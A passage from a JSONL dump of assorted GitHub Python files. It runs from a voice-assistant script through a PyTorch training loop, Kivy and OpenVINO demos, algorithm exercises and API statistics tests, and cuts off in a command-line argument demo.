speak(\"hi,how may I help you?\")\n\n elif 'what can you do ' in query:\n speak(\"tell me something to do \")\n\n elif query == \"jarvis\":\n speak(\"Order Sir\")\n\n elif 'quit' in query or 'bye' in query or \"terminate\" in query or \"thank you\" in query or \"thanks\" in query:\n speak(\"see you again\")\n break\n\n elif 'search google' in query:\n speak(\"what do you want to search?\")\n command = takeCommand()\n list = []\n speak(\"searching google\")\n for i in search(command, tld=\"co.in\", num=4, stop=4, pause=2):\n print(i)\n list.append(i)\n\n speak(\"wanna make me search for one of the urls in browser?\")\n cmd = takeCommand()\n if 'yes' in cmd:\n speak(\"which one? \")\n ans = takeCommand()\n if 'first' in ans or 'I' in ans or '1' in ans:\n speak(\"searching\")\n webbrowser.get(chrome_path).open_new_tab(list[0])\n if 'second' in ans or 'II' in ans or '2' in ans:\n speak(\"searching\")\n webbrowser.get(chrome_path).open_new_tab(list[1])\n if 'third' in ans or 'III' in ans or '3' in ans:\n speak(\"searching\")\n webbrowser.get(chrome_path).open_new_tab(list[2])\n if 'fourth' in ans or 'IV' in ans or '4' in ans:\n speak(\"searching\")\n webbrowser.get(chrome_path).open_new_tab(list[3])\n\n else:\n exit\n break\n\n else:\n speak(\"ok\")\n break\n\n elif 'open vs code' in query:\n speak('opening v s code')\n os.startfile(\n \"C:\\\\Users\\\\2019c\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\")\n elif 'open my facebook' in query:\n speak(\"opening your facebook\")\n webbrowser.get(chrome_path).open(\"www.facebook.com/ritek.saxena.3\")\n\n elif 'open my instagram' in query:\n speak(\"opening your instagram\")\n webbrowser.get(chrome_path).open(\n \"https://www.instagram.com/ritek_saxena/?hl=en\")\n\n else:\n speak(f'searching {query} over the internet ')\n query = query.replace(\"wikipedia\", \"\")\n results = wikipedia.summary(query, sentences=1)\n print(results)\n speak(results)\n","repo_name":"RitekSaxena/Personal-assistant","sub_path":"Assistant.py","file_name":"Assistant.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"29667693465","text":"import os\nimport sys\nimport cv2\nimport yaml\n\ndef configGen(filepath):\n config = {}\n fs = cv2.FileStorage(\"{}/camera_parameter.yml\".format(filepath), cv2.FILE_STORAGE_READ)\n with open(\"{}/ORB.yaml\".format(filepath), \"w\") as w:\n w.write(\"%YAML:1.0\\n\")\n fn = fs.getNode(\"camera_matrix\")\n m = fn.mat()\n config[\"Camera.fx\"] = float(m[0][0])\n config[\"Camera.fy\"] = float(m[1][1])\n config[\"Camera.cx\"] = float(m[0][2])\n config[\"Camera.cy\"] = float(m[1][2])\n\n fn = fs.getNode(\"distortion_coefficients\")\n m = fn.mat()\n config[\"Camera.k1\"] = float(m[0])\n config[\"Camera.k2\"] = float(m[1])\n config[\"Camera.p1\"] = float(m[2])\n config[\"Camera.p2\"] = float(m[3])\n config[\"Camera.k3\"] = float(m[4])\n\n config[\"Camera.fps\"] = 30.0\n config[\"Camera.RGB\"] = 1\n\n config[\"ORBextractor.nFeatures\"] = 5000\n config[\"ORBextractor.scaleFactor\"] = 1.2\n config[\"ORBextractor.nLevels\"] = 15\n config[\"ORBextractor.iniThFAST\"] = 20\n config[\"ORBextractor.minThFAST\"] = 7\n\n config[\"Viewer.KeyFrameSize\"] = 0.05\n config[\"Viewer.KeyFrameLineWidth\"] = 1\n config[\"Viewer.GraphLineWidth\"] = 0.9\n config[\"Viewer.PointSize\"] = 2\n config[\"Viewer.CameraSize\"] = 0.08\n config[\"Viewer.CameraLineWidth\"] = 3\n config[\"Viewer.ViewpointX\"] = 0\n config[\"Viewer.ViewpointY\"] = -0.7\n config[\"Viewer.ViewpointZ\"] = -1.8\n config[\"Viewer.ViewpointF\"] = 500\n\n yaml.dump(config, w, default_flow_style=False)\n\n\nif __name__ == \"__main__\":\n configGen(sys.argv[1]) ","repo_name":"mhyeh/AccidentSceneReconstruction","sub_path":"configGen.py","file_name":"configGen.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35926457288","text":"import torch.nn.functional as F\nimport torch\n\ndef train(model, optimizer, loss_fn, train_loader, val_loader, epochs=20, device=\"cpu\"):\n for epoch in range(epochs):\n print(f\"epoch: {epoch}\")\n training_loss = 0.0\n valid_loss = 0.0\n model.train()\n \n for batch in train_loader:\n optimizer.zero_grad()\n input,target = batch\n print(input)\n print(target)\n print(device)\n input = input.to(device)\n print(\"after input\")\n target = target.to(device)\n print(\"after output\")\n output = model(input)\n print(\"after model\")\n loss = loss_fn(output,target)\n print(\"loss input\")\n loss.backward()\n optimizer.step()\n training_loss+= loss.data.item()\n \n training_loss /= len(train_loader)\n \n model.eval()\n num_correct = 0\n num_examples = 0\n \n for batch in val_loader:\n input, target = batch\n input = input.to(device)\n target = target.to(device)\n output = model(input)\n loss = loss_fn(output,target)\n valid_loss += loss.data.item()\n correct = torch.eq(torch.max(F.softmax(output),dim=1)[1],target).view(-1)\n \n num_correct += torch.sum(correct).item()\n num_examples += correct.shape[0]\n valid_loss /= len(val_loader)\n \n print('Epoch: {}, Training loss: {:.2f}, \\\n Validation Loss: {:.2f}, \\\n accuracy: {:.2f}'.format(epoch, training_loss, valid_loss, num_correct/num_examples)\n )\n print(\"here\")\n torch.save(model.state_dict(),\"model/net/final.model\")","repo_name":"NajiAboo/dog-cat-classification","sub_path":"trainmodel/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72495528108","text":"from engine.models import *\n\nprev_ip = \"172.16.18.249:443\"\nnew_ip = \"127.0.0.1:8000\"\n\nfor s in Sentences.objects.all():\n\ts.sentence = s.sentence.replace(prev_ip, new_ip)\n\ts.save()\n\nfor valid in DataValidators.objects.all():\n\tvalid.function = valid.function.replace(prev_ip, new_ip)\n\tvalid.save()\n\n","repo_name":"olofmeister442/temp","sub_path":"replace_ip.py","file_name":"replace_ip.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14694930125","text":"def search_rotated_array(arr, num):\n return search(arr, num, 0, len(arr)-1)\n\n\ndef search(arr, num, l, r):\n\n # If left less than right, num is not in arr\n if l > r:\n return -1\n\n # Find midpoint\n m = (l + r) // 2\n\n # Check if mid element is equal to num. If it is, return that index\n if arr[m] == num:\n return m\n\n # If first element is less than midpoint, left half is ordered correctly\n if arr[l] <= arr[m]:\n\n # Check if num is between the values. If it is, we can normal b search left subarray\n if arr[l] <= num and num <= arr[m]:\n return search(arr, num, l, m-1)\n\n # If not, we can repeat process with right subarray\n else:\n return search(arr, num, m+1, r)\n\n # If midpoint is less than last element, right half is ordered correctly\n elif arr[m] < arr[r]:\n\n # Check if num is between the values. If it is, we can normal b search right subarray\n if arr[m] <= num and num <= arr[r]:\n return search(arr, num, m+1, r)\n\n # If not, we can repeat process with left subarray\n else:\n return search(arr[:m], num, l, m-1)\n\n # If above conditions fail, we have an error\n else:\n return 'ERROR'\n\n\nif __name__ == '__main__':\n arr = [9, 12, 17, 2, 4, 5]\n num = 9\n print(search_rotated_array(arr, num))","repo_name":"troywsmith/pygo","sub_path":"practice/Pramp/search_rotated_arr.py","file_name":"search_rotated_arr.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22695111177","text":"from kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.widget import Widget\n\n\nclass MainWindow(FloatLayout):\n def __init__(self):\n super().__init__()\n\n self.btn1= Button(\n text=\"Hello\",\n size = (200,100), #1.szélesség, 2.magasság\n #width=200,\n #height=300,\n size_hint=(None, None), #default size_hint=(1, 1)\n pos_hint={\"center_y\":0.5}\n )\n self.btn1.bind(on_press=self.push)\n\n self.btn2=Button(\n text=\"Center\",\n size_hint=(.2,.4),\n pos_hint={\"center\" : (0.5, 0.5)} #center_x center_y\n )\n self.btn2.bind(on_press=App.get_running_app().stop)\n\n self.btn3 = Button(\n text=\"Top/Right\",\n size_hint=(.2, 0.4),\n pos_hint = {\"top\": 0.5, \"right\": 0.5}\n )\n self.btn3.bind(state=self.callback)\n self.btn4 = Button(\n text=\"x, y\",\n size_hint=(.2, 0.4),\n pos_hint={\"x\": 0.5, \"y\": 0.5}\n )\n self.add_widget(self.btn1)\n self.add_widget(self.btn2)\n self.add_widget(self.btn3)\n self.add_widget(self.btn4)\n def push(self,instance): #instance a példányneve lesz\n print(\"Megnyomtad gombot\")\n def callback(self, instance, value):\n print(\"My button <%s> state is <%s>\" % (instance, value))\n\n\nclass TestApp(App):\n def build(self):\n return MainWindow()\n\nTestApp().run()","repo_name":"intelbarna97/python_01","sub_path":"pythonProject/06_floatlayout.py","file_name":"06_floatlayout.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40596520489","text":"import os\nimport logging\nfrom solarvino.iterator import DirectoryIterator\nfrom solarvino.inference import KeypointInference\n\n\nclass Config:\n device = 'CPU'\n\n num_streams = ''\n num_threads = None\n num_infer_requests = 1\n\n image_directory = '/Users/huangshangyu/Downloads/experiment/maskimage/Crowd_Human/No_Mask'\n save_dir = '/Users/huangshangyu/Downloads/experiment/facekpt/tmp/inference'\n\n model_dir = '/Users/huangshangyu/Projects/solarfresh/solarvino/assets/intel/landmarks-regression-retail-0009'\n model_xml_path = os.path.join(model_dir, 'landmarks-regression-retail-0009.xml')\n model_bin_path = os.path.join(model_dir, 'landmarks-regression-retail-0009.bin')\n\n\nif __name__ == '__main__':\n logging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s',\n level=logging.INFO,\n datefmt='%Y-%m-%d %H:%M:%S')\n\n config = Config()\n\n data_generator = DirectoryIterator(directory=config.image_directory)\n inferencer = KeypointInference(device=config.device,\n num_streams=config.num_streams,\n num_threads=config.num_threads,\n num_infer_requests=config.num_infer_requests,)\n\n inferencer \\\n .load_model(model_xml_path=config.model_xml_path,\n model_bin_path=config.model_bin_path,) \\\n .inference(data_generator=data_generator, save_dir=config.save_dir)\n","repo_name":"solarfresh/solarvino","sub_path":"scripts/landmarks.py","file_name":"landmarks.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24319258021","text":"# values = [60, 100, 120]\n# weights = [10, 20, 30]\n# 50\n\n# 220\n\n# DFS, greedy, dp\n# weights for idx, total values for elems\n# [0, 1, 2, 3, 10...20...30...40...50]\n# [0, 0, 0, 0, 60 100 160 180 220]\n# \n\n\n# a row num = the range of items we are considering\n# col num = the weight we are trying to fill\ndef knapsack(vals, wts, W):\n dp = [[0 for _ in range(W + 1)] for _ in range(len(vals) + 1)]\n for i in range(len(dp)):\n for w in range(len(dp[0])):\n if i == 0 or w == 0:\n dp[i][w] = 0\n # if curr item's wt is too large, we cant consider it for this curr wt\n # so just refer to val above ()\n elif wts[i - 1] > w:\n dp[i][w] = dp[i - 1][w]\n else:\n # max of: best val while not considering the curr item and \n # val of curr item + best while not considering the curr item at the remaining weight\n dp[i][w] = max(vals[i-1] + dp[i - 1][w - wts[i - 1]], dp[i - 1][w])\n return dp[-1][-1]\n\nprint (knapsack([60, 100, 120], [10, 20, 30], 50))","repo_name":"rjk79/Data-Structures-Algorithms-System-Design","sub_path":"geeksforgeeks/dynamic programming/01_knapsack.py","file_name":"01_knapsack.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11087166685","text":"import time\nfrom typing import List\n\nfrom ..base.hyperionrequest import HyperionRequest\nfrom ...models.genshin.gacha import GachaInfo\n\n__all__ = (\"Gacha\",)\n\n\nclass Gacha:\n GACHA_LIST_URL = \"https://webstatic.mihoyo.com/hk4e/gacha_info/cn_gf01/gacha/list.json\"\n GACHA_INFO_URL = \"https://webstatic.mihoyo.com/hk4e/gacha_info/cn_gf01/%s/zh-cn.json\"\n\n USER_AGENT = (\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/90.0.4430.72 Safari/537.36\"\n )\n\n def __init__(self):\n self.headers = {\n \"User-Agent\": self.USER_AGENT,\n }\n self.client = HyperionRequest(headers=self.headers)\n self.cache = {}\n self.cache_ttl = 600\n\n async def get_gacha_list_info(self) -> List[GachaInfo]:\n if self.cache.get(\"time\", 0) + self.cache_ttl < time.time():\n self.cache.clear()\n cache = self.cache.get(\"gacha_list_info\")\n if cache is not None:\n return cache\n req = await self.client.get(self.GACHA_LIST_URL)\n data = [GachaInfo(**i) for i in req[\"list\"]]\n self.cache[\"gacha_list_info\"] = data\n self.cache[\"time\"] = time.time()\n return data\n\n async def get_gacha_info(self, gacha_id: str) -> dict:\n cache = self.cache.get(gacha_id)\n if cache is not None:\n return cache\n req = await self.client.get(self.GACHA_INFO_URL % gacha_id)\n self.cache[gacha_id] = req\n return req\n\n async def close(self):\n await self.client.shutdown()\n","repo_name":"PaiGramTeam/PaiGram","sub_path":"modules/apihelper/client/components/gacha.py","file_name":"gacha.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"37"} +{"seq_id":"30286221401","text":"from services import MatchingService\nimport json\n\n\nif __name__ == '__main__':\n with open('searches.txt', 'r', encoding='utf-8') as file:\n searches = [line.strip() for line in file]\n \n with open('properties.json', 'r', encoding='utf-8') as file:\n properties = json.load(file)\n\n matched_searches = MatchingService(\n searches=searches,\n properties=properties,\n ).match()\n\n assert matched_searches == [\n 'ciudad de méxico/cuauhtémoc',\n 'ciudad de méxico/cuauhtémoc/property_type__office,apartment/size__100_200/price__3000000_4000000/bedrooms_2/bathrooms_1',\n 'Chihuahua/Chihuahua/property_type__house,office/size__80',\n ]","repo_name":"CisEfrain/challenges-tl-neximo","sub_path":"second/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19729563881","text":"import csv\n\ndef parse_naves(filepath):\n with open(filepath) as f:\n content = f.readlines()\n \n content = [x.strip() for x in content]\n \n entries = {}\n\n i = -1\n state = \"find_entry\"\n current_entry = None\n current_text = None\n \n while True:\n i += 1\n if i >= len(content):\n break\n line = content[i]\n if len(line) == 0:\n continue\n\n if state == \"find_entry\":\n if line.isupper():\n if line == \"NAVES TOPICAL BIBLE\":\n continue\n else:\n current_entry = line.lower()\n state = \"find_text\"\n elif state == \"find_text\":\n if line.isupper():\n continue\n if line.isdigit():\n continue\n entries[current_entry] = line\n state = \"find_entry\"\n \n return entries\n\ndef read_topics(filepath):\n topics = []\n with open(filepath) as f:\n reader = csv.reader(f, delimiter = \",\")\n \n for line in reader:\n topic = line[0]\n topics.append(topic)\n return topics\n\ndef main():\n entries = parse_naves(\"../raw/naves.txt\")\n topics = read_topics(\"../ner_entities/topics.csv\")\n\n with open(\"../ner_entities/topics_annotated.csv\", \"w+\") as f:\n for topic in topics:\n if topic in entries:\n f.write(topic + \",\" + entries[topic] + \"\\n\")\n else:\n f.write(topic + \"\\n\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"jadielam/intent-ranking","sub_path":"code/data/scripts/naves_parsing.py","file_name":"naves_parsing.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37080669032","text":"#Program to find number is divisible by 5 or not\r\n#Business Logic\r\ndef Divisible(No):\r\n if(No%5==0):\r\n return True\r\n else:\r\n return False\r\n\r\n#Main Function\r\ndef main():\r\n print(\"Please Enter the Number\")\r\n Num = int(input())\r\n\r\n Return = Divisible(Num)\r\n\r\n if(Return == True):\r\n print(\"Given no is Divisible by 5\")\r\n else:\r\n print(\"Given no is not Divisible by 5\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\"\"\"\r\nInput - 50\r\nOutput - Given No is divisible by 5\r\n\"\"\"","repo_name":"shonty99/Python-Programs","sub_path":"Assign1.4.py","file_name":"Assign1.4.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8214252227","text":"from app import db\nfrom app.api import bp\nfrom app.models import Product, ProductUser\nfrom app.producer import publish\nfrom flask import abort, jsonify\nimport requests, json\n\n\n@bp.route('/products')\ndef index():\n queries = db.session.execute(db.select(Product)).fetchall()\n products = [query[0].serialized for query in queries]\n return jsonify(products)\n\n@bp.route('/products//like', methods=['POST'])\ndef like(id):\n req = requests.get('http://172.18.0.1:8000/api/user')\n data = req.json()\n\n try:\n product_user = ProductUser(user_id=data['id'], product_id=id)\n db.session.add(product_user)\n db.session.commit()\n\n publish('product_liked', id)\n\n except:\n abort(400, 'You already liked this product.')\n\n return jsonify({\n 'message': 'success'\n })\n\n\n","repo_name":"losmiv/microservices-proj","sub_path":"main/app/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19535569051","text":"### 5miles facial expression estimation\nimport os, sys, time, shutil, glob\nthreads = '8'\nos.environ[\"OMP_NUM_THREADS\"] = threads\nos.environ[\"OPENBLAS_NUM_THREADS\"] = threads\nos.environ[\"MKL_NUM_THREADS\"] = threads\nos.environ[\"VECLIB_MAXIMUM_THREADS\"] = threads\nos.environ[\"NUMEXPR_NUM_THREADS\"] = threads\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..')))\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom PIL import Image\n\nimport torch\nimport torchvision.transforms as transforms\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.backends.cudnn as cudnn\n\nfrom utils import *\nfrom FBP5500.trained_models_for_pytorch import Nets\n\nclass FBPDataset(Dataset):\n \n def __init__(self, root, transform):\n self.root = root\n self.transform = transform\n \n def __len__(self):\n return len(glob.glob(os.path.join(self.root, '*.jpg')))\n \n def __getitem__(self, index):\n image_files = sorted([x.split('/')[-1] for x in glob.glob(f'{self.root}/*.jpg')])\n image = Image.open(os.path.join(self.root, image_files[index])).convert('RGB')\n if self.transform is not None:\n image = self.transform(image)\n return (image_files[index].split('.')[0], image)\n \nif __name__ == '__main__':\n \n align_dir = 'aligned' # folder saving aligned faces\n score_dir = 'scores' # folder for saving scores\n assert os.path.exists(align_dir), 'Directory saving aligned face images does not exist!'\n assert os.path.exists(score_dir), 'Directory saving scores does not exist!'\n \n device = 'cuda'\n\n # net definition \n net = Nets.AlexNet().to(device)\n\n model_dict = net.state_dict()\n pretrained_dict = torch.load(f\"{os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..'))}/FBP5500/trained_models_for_pytorch/models/alexnet.pth\", encoding='latin1')\n pretrained_dict = {k: v for k, v in pretrained_dict['state_dict'].items() if k in model_dict}\n model_dict.update(pretrained_dict)\n net.load_state_dict(model_dict)\n\n # evaluate\n net.eval()\n\n # loading data...\n transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),]) \n test_dataset = FBPDataset(align_dir, transform)\n test_loader = DataLoader(test_dataset, batch_size=8, num_workers=8, shuffle=False)\n\n scores = []\n t0 = time.time()\n for i, (img_id, img) in enumerate(test_loader):\n img = img.to(device) # (bs, 3, 224, 224)\n with torch.no_grad():\n score = net(img)\n score_df = pd.DataFrame(score.cpu().detach().numpy(), columns=['beauty'])\n score_df.insert(0, 'seller_ID', img_id)\n scores.append(score_df)\n scores_df = pd.concat(scores)\n scores_df = scores_df.sort_values('seller_ID').reset_index(drop=True)\n print(f'Time FBP5500: {round(time.time() - t0, 2)}s')\n\n scores_df.to_csv(f'{score_dir}/seller_beauty.csv', sep='\\t', index=False)\n ","repo_name":"xinyiyu/Smile_yxy","sub_path":"5miles_smile/code/estimate_beauty.py","file_name":"estimate_beauty.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71074631468","text":"from base_class import BaseClass\nfrom datetime import datetime\nfrom dateutil import parser\nimport time\nimport pytz\nfrom tzlocal import get_localzone\n\nfrom resources.resources import warp, no_faces, several_faces\nfrom utils.common.switch import switch\n\nutc = pytz.timezone(get_localzone().zone)\n\n\ndef get_time(time_str):\n date_time = parser.parse(time_str)\n return date_time\n\n\ndef get_iso_format(t):\n return t.isoformat(\"T\")\n\n\nclass TestStatistic(BaseClass):\n start = None\n end = None\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.start = datetime.now(get_localzone()).replace(microsecond=0)\n\n time.sleep(2)\n person_id = TestStatistic.employer.api_client.createPerson(raiseError=True).body[\"person_id\"]\n descriptor_id = TestStatistic.employer.api_client.extractDescriptors(\n filename=warp,\n warpedImage=True, raiseError=True).body[\"faces\"][0][\"id\"]\n TestStatistic.employer.api_client.extractDescriptors(\n filename=no_faces)\n TestStatistic.employer.api_client.linkDescriptorToPerson(person_id, descriptor_id, raiseError=True)\n TestStatistic.employer.api_client.identify(personId=person_id, personIds=[person_id], raiseError=True)\n TestStatistic.employer.api_client.match(personId=person_id, descriptorIds=[descriptor_id],\n raiseError=True)\n TestStatistic.employer.api_client.verify(personId=person_id, descriptorId=descriptor_id, raiseError=True)\n TestStatistic.employer.api_client.search(descriptorIds=[descriptor_id],\n filename=warp,\n raiseError=True)\n TestStatistic.employer.api_client.search(descriptorIds=[descriptor_id],\n filename=several_faces,\n raiseError=False)\n TestStatistic.employer.api_client.search(descriptorIds=[descriptor_id],\n filename=no_faces,\n raiseError=False)\n cls.end = datetime.now(get_localzone()).replace(microsecond=0)\n time.sleep(1)\n TestStatistic.employer.api_client.match(personId=person_id, descriptorIds=[descriptor_id],\n raiseError=True)\n\n def test_statistic_by_period(self):\n for resource in [\"extract_success\", \"matching_success\", \"errors\"]:\n with self.subTest(resource=resource):\n response = TestStatistic.admin_client.get_statistic(resource, {\"group_by\": \"1s\",\n \"time__lt\": get_iso_format(\n TestStatistic.end),\n \"time__gte\": get_iso_format(\n TestStatistic.start),\n })\n self.assertEqual(200, response.status_code)\n response_start_period = get_time(response.content[\"values\"][0][0])\n self.assertTrue(response_start_period >= TestStatistic.start,\n \"{}, {}\".format(response_start_period, TestStatistic.start))\n response_end_period = get_time(response.content[\"values\"][-1][0])\n self.assertTrue(response_end_period <= TestStatistic.end)\n\n def test_statistic_group_time(self):\n\n for resource in [\"extract_success\", \"matching_success\", \"errors\"]:\n with self.subTest(resource=resource):\n for group_step in [\"s\", \"d\", \"w\", \"h\", \"m\"]:\n with self.subTest(group_step=group_step):\n response = TestStatistic.admin_client.get_statistic(resource,\n {\"group_by\": \"1{}\".format(group_step)\n })\n self.assertEqual(200, response.status_code)\n response_start_period = get_time(response.content[\"values\"][0][0])\n for case in switch(group_step):\n if case(\"w\"):\n self.assertEqual(0, response_start_period.hour)\n if case(\"d\"):\n self.assertEqual(0, response_start_period.hour)\n if case(\"h\"):\n self.assertEqual(0, response_start_period.minute)\n if case(\"m\"):\n self.assertEqual(0, response_start_period.second)\n if case(\"s\"):\n self.assertEqual(0, response_start_period.microsecond)\n if case():\n continue\n\n def test_statistic_by_account(self):\n\n for resource in [\"extract_success\", \"matching_success\", \"errors\"]:\n with self.subTest(resource=resource):\n accounts = [{\"account_id\": TestStatistic.employer.account_id, \"count\": 1},\n {\"account_id\": TestStatistic.employer2.account_id, \"count\": 0}]\n for account in accounts:\n response = TestStatistic.admin_client.get_statistic(resource,\n {\n \"account_id\": account[\"account_id\"]})\n self.assertEqual(200, response.status_code)\n if account[\"count\"]:\n self.assertTrue(len(response.content[\"values\"]) > 0)\n else:\n self.assertDictEqual({}, response.content)\n\n def test_statistic_by_matcing_resource(self):\n for resource in [\"search\", \"match\", \"identify\", \"verify\"]:\n with self.subTest(resource=resource):\n response = TestStatistic.admin_client.get_statistic(\"matching_success\",\n {\n \"account_id\": TestStatistic.employer.account_id,\n \"resource\": resource,\n \"group_by\": \"1ms\"\n })\n self.assertEqual(200, response.status_code)\n self.assertTrue(len(response.content[\"values\"]), 1)\n response = TestStatistic.admin_client.get_statistic(\"matching_success\",\n {\n \"account_id\": TestStatistic.employer.account_id,\n \"group_by\": \"1ms\"\n })\n self.assertEqual(200, response.status_code)\n self.assertTrue(len(response.content[\"values\"]), 4)\n\n def test_statistic_agregators(self):\n def test_count():\n for resource in [\"extract_success\", \"matching_success\"]:\n with self.subTest(resource=resource):\n response = TestStatistic.admin_client.get_statistic(resource, {\"aggregator\": \"count\",\n \"account_id\": TestStatistic.employer.account_id})\n self.assertEqual(200, response.status_code)\n for value in response.content[\"values\"]:\n for v in value[1:]:\n self.assertEqual(type(v), int)\n for column in response.content[\"columns\"][1:]:\n self.assertTrue(column.startswith(\"count\"))\n\n def test_max_min_mean():\n agregators = [{\"agregator\": \"max\", \"res\": {}}, {\"agregator\": \"min\", \"res\": {}},\n {\"agregator\": \"mean\", \"res\": {}}]\n for agregator in agregators:\n response = TestStatistic.admin_client.get_statistic(\"matching_success\",\n {\"aggregator\": agregator[\"agregator\"],\n \"account_id\": TestStatistic.employer.account_id})\n agregator[\"res\"] = response.content[\"values\"]\n for column in response.content[\"columns\"][1:]:\n self.assertTrue(column.startswith(agregator[\"agregator\"]))\n\n for i in range(len(agregators[0][\"res\"])):\n for j in range(len(agregators[0][\"res\"][1:])):\n self.assertTrue(agregators[0][\"res\"][i][j] > agregators[2][\"res\"][i][j])\n self.assertTrue(agregators[2][\"res\"][i][j] > agregators[1][\"res\"][i][j])\n\n test_count()\n test_max_min_mean()\n\n def test_other_params(self):\n params = [\n {\"name\": \"server\", \"value\": \"127.0.0.1\", \"resources\": [\"extract_success\", \"matching_success\", \"errors\"]},\n {\"name\": \"limit\", \"value\": 4, \"resources\": [\"matching_success\"]},\n {\"name\": \"template\", \"value\": 1, \"resources\": [\"matching_success\"]},\n {\"name\": \"candidate\", \"value\": 1, \"resources\": [\"matching_success\"]},\n {\"name\": \"count_faces\", \"value\": 3, \"resources\": [\"matching_success\"]}]\n for param in params:\n with self.subTest(param=param[\"name\"]):\n for resource in param[\"resources\"]:\n with self.subTest(resource=resource):\n response = TestStatistic.admin_client.get_statistic(resource, {param[\"name\"]: param[\"value\"]})\n self.assertEqual(200, response.status_code)\n\n def test_bad_params(self):\n bad_params = [\n {\"name\": \"aggregator\", \"value\": \"c\", \"resources\": [\"extract_success\", \"matching_success\", \"errors\"]},\n {\"name\": \"group_by\", \"value\": \"3sec\", \"resources\": [\"extract_success\", \"matching_success\", \"errors\"]}]\n for bad_param in bad_params:\n with self.subTest(param_name=bad_param[\"name\"]):\n for resource in bad_param[\"resources\"]:\n with self.subTest(resource=resource):\n self.badParamTests({bad_param[\"name\"]: bad_param[\"value\"]},\n BaseClass.admin_client.get_statistic,\n resource=resource)\n\n def test_error_code(self):\n errors = [{\"errror_code\": 4003, \"count\": 2}, {\"errror_code\": 11012, \"count\": 1}]\n for error in errors:\n with self.subTest(errror_code=error[\"errror_code\"]):\n response = TestStatistic.admin_client.get_statistic(\"errors\", {\"aggregator\": \"count\",\n \"account_id\": TestStatistic.employer.account_id,\n \"error\": error[\"errror_code\"],\n \"group_by\": \"1d\"})\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.content[\"values\"][0][1], error[\"count\"])\n\n def test_error_resource(self):\n errors = [{\"resource\": \"descriptors\", \"count\": 1}, {\"resource\": \"search\", \"count\": 2}]\n for error in errors:\n with self.subTest(resource=error[\"resource\"]):\n response = TestStatistic.admin_client.get_statistic(\"errors\", {\"aggregator\": \"count\",\n \"account_id\": TestStatistic.employer.account_id,\n \"resource\": error[\"resource\"],\n \"group_by\": \"1d\"})\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.content[\"values\"][0][1], error[\"count\"])\n\n def test_method_not_allowed(self):\n for resource in [\"extract_success\", \"matching_success\", \"errors\"]:\n with self.subTest(resource=resource):\n self.methodNotAllowed(\"{}/realtime_statistics/{}\".format(TestStatistic.admin_client.url, resource),\n [\"post\", \"put\", \"delete\", \"patch\"])\n","repo_name":"qonteo/luna","sub_path":"luna_v.3.3.3/luna-admin/tests/tests_api/statistic_test.py","file_name":"statistic_test.py","file_ext":"py","file_size_in_byte":12881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7235525221","text":"import sys\n\n# argumente\n\n# print(sys.argv[0]) # numele executabilului\n\n# print(sys.argv)\n\n\n# n = 0\nname = sys.argv[1]\nrep = int(sys.argv[2])\n\n# while n < rep:\n# print(name)\n# n += 1\n\ndef show_help():\n print(\"\"\"Usage: script_name.py NAME REPS\n \nNAME = nume de afisat\nREPS = de cate ori sa afiseze\n\nOptiuni:\n -n = Arata acest help\n\"\"\")\n sys.exit(1)\n\nif len(sys.argv) > 1:\n if sys.argv[1] == \"-h\":\n show_help()\n name = sys.argv[1]\nelse:\n show_help()\n\nif len(sys.argv) > 2:\n rep = int(sys.argv[2])\n\nfor i in 